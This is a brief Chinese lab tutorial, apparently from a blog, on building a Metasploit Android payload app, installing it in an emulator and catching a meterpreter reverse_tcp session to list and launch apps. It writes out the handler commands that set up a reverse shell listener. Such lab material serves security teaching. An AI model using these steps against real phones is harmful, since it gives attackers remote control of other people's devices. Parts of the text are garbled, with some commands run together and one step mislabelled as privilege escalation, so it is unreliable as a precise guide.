MSF模拟渗透测试之攻击Android

MSF模拟渗透测试之攻击Android

文章目录

  • MSF模拟渗透测试之攻击Android
  • 前言
  • 一、生成一个test.apk文件
  • 二、在kali中打开监听,进行提权
  • 1.打开kali,进行监听
    • 2.返回会话,进行提权
  • 总结

前言

一、生成一个test.apk文件

在kali上生成test.apk文件
MSF模拟渗透测试之攻击Android_第1张图片
ls查看文件所在位置,在桌面复制到主机桌面
在主机下载逍遥模拟器
安装好后,点击右边的安装,安装test.apk文件后,出现MainActivity图标
MSF模拟渗透测试之攻击Android_第2张图片

二、在kali中打开监听,进行提权

1.打开kali,进行监听

(1)打开msfvenom
使用监听模块
use exploit/multi/handler
设置payload
set payload android/meterpreter/reverse_tcp
MSF模拟渗透测试之攻击Android_第3张图片
options
设置ip,端口
set lhost 192.168.222.131
setlport 4554
run后,出现会话
MSF模拟渗透测试之攻击Android_第4张图片
返回会话,提权成功。

2.返回会话,进行提权

输入?
查看可用信息
app_list,查看手机上安装的app
MSF模拟渗透测试之攻击Android_第5张图片
输入app_run com.android.browser
打开手机端的浏览器

MSF模拟渗透测试之攻击Android_第6张图片
打开成功,实验结束。

总结

本次实验MSF对Android端进行生成payload,获取对方的会话,进行提权的过程也是一次简单的对Android的渗透测试攻击。

你可能感兴趣的:(MFS渗透测试,测试工具,运维开发)